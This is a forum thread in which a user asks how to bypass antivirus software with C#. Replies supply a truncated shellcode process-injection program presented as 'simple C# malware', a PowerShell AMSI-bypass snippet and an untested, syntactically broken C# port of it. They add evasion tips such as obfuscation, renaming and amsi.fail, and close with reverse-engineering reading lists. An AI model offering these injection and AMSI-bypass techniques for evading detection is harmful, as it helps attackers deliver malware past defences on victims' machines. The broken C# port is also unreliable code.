How to Bypass Anti-Viruses by C#？How to learn?

pryoc110 · August 9, 2022, 4:00pm

Hello every I am learning C#. because I want to bypass Anti-Viruses by C#.But I don’t know how to learn this knowledge about bypass Anti-Viruses by C#.

dmcxblue · August 10, 2022, 11:50pm

Hey!!
Well I’d recommend you first understand the AV’s then learn some basic C#. One of the thing about evading AV is understanding what is being detected.

You don’t need to write in C but this is a good read on understand why the methods work

The following Link has references and ideas on how to execute Shell-code on your C# malware

This is a simple C# malware that injects and executes shellcode

github.com

S3cur3Th1sSh1t/Creds/blob/master/Csharp/Dinvoke_CreateRemoteThread.cs

// stolen from https://rastamouse.me/blog/process-injection-dinvoke/
using System;
using System.IO;
using System.Runtime.InteropServices;

using SharpSploit.Execution.DynamicInvoke;

namespace InjectionTest
{
    class Program
    {
        static void Main(string[] args)
        {
            var shellcode = File.ReadAllBytes(args[0]);

            var pointer = Generic.GetLibraryAddress("kernel32.dll", "OpenProcess");
            var openProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(OpenProcess)) as OpenProcess;
            var hProcess = openProcess(0x001F0FFF, false, int.Parse(args[1]));

            pointer = Generic.GetLibraryAddress("kernel32.dll", "VirtualAllocEx");

This file has been truncated. show original

If you can look onto other researchers on the different methods they execute their malware you can grab an idea on how to write your own. For evading is usually stuff as changing variables names, removing comments, different methods of execution, size, flow of execution, obfuscation. You can use these terms to research methods of evading AV as these are used in different places (Go, PowerShell, C, F#, etc)

Good Luck!

LambdaCalculus · September 10, 2022, 6:53pm

Hey @pryoc110. It should be noted that the C# programming language may not be the best for developing malware to evade antivirus. Microsoft recently integrated their anti-malware scan interface with the .NET framework (Ashcraft, 2019), so in my non-expert opinion, only use C# AV avoidance techniques if you’re up for a good challenge — especially if you’re going to use the assembly in a real life situation!

But if you really want to try to evade antivirus with a .NET assembly written in C#, I was able to find a few interesting projects and research that might be able to help you. Chandel (2022) discusses seven different techniques for bypassing the AMSI service. They’re mostly applied to PowerShell, but I do think that with a bit of creativity, you can implement them in C#.

For example, consider this snippet in Chandel’s article:

$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)

[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)

This is referencing a function called amsiInitFailed() and trying to set it to true as to “tricking,” for lack of a better term, the interface into not scanning the assembly in question. Here is a simple PowerShell-to-C# pseudo-port that I whipped up (that I didn’t bother to test, I’ll leave that up to you ;-):

using System;
using System.Runtime.InteropServices;

public class Programme {
    public static void Main(string[] args) {
        var mem = System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);
        Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue(null, null);
        Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue(null, (IntPtr)mem)
    }
}

There are also websites like amsi.fail that take in (specifically PowerShell) code, and obfuscates and mangles them to the point that AMSI will get too confused and not recognise the malicious nature of the thing. I do recommend using these as a starting point for getting your C# malware up and going

pryoc110 · September 16, 2022, 6:48am

That’s awesome! I’m going to learn these great projects and knowledge.

pryoc110 · January 5, 2023, 8:00am

Hi dude，I took your advice and went to learn some reverse knowledge, such as PE structure, assembly code, C and C++

LambdaCalculus · February 13, 2023, 11:06am

Awww thanks

I am no expert, but here are some resources for you:

Books

C++ Crash Course: A Fast-Paced Introduction (Lospinoso 2019)
The Secret Life of Programs (Steinhart 2019)
Practical Binary Analysis (Andriesse 2018)
Practical Reverse Engineering (Dang et al 2014)
Ghidra Software Reverse Engineering for Beginners (David 2021)

Online Resources

Malware Unicorn’s online resources: https://malwareunicorn.org/#/resources
- and of course Malware Unicorn’s workshops/labs: https://malwareunicorn.org/#/workshops
There’s Hasherezade’s blog post to get you up to speed on learning malware analysis (and hence more about native PE executables): https://hshrzd.wordpress.com/how-to-start/
Here is a YouTube course on reverse engineering: https://www.youtube.com/watch?v=fv9ii3W5htQ&list=PLHJns8WZXCdvaD7-xR7e5FJNW_6H9w-wC
There’s VX Underground, which is just an amazing resource: https://www.vx-underground.org/
Finally, and this is bit self-promoting, but here is VX Reloaded, which is my personal project in writing malware for fun, not profit. I just have a simple Python file infector, but plan to add more stuff in the future! https://vxreloaded.github.io/

P.S. sorry for the l8 response

pryoc110 · March 1, 2023, 2:42am

Thx friend.I will seriously study these resources you recommend.

LambdaCalculus · July 24, 2023, 2:54pm

I am totally glad that I could help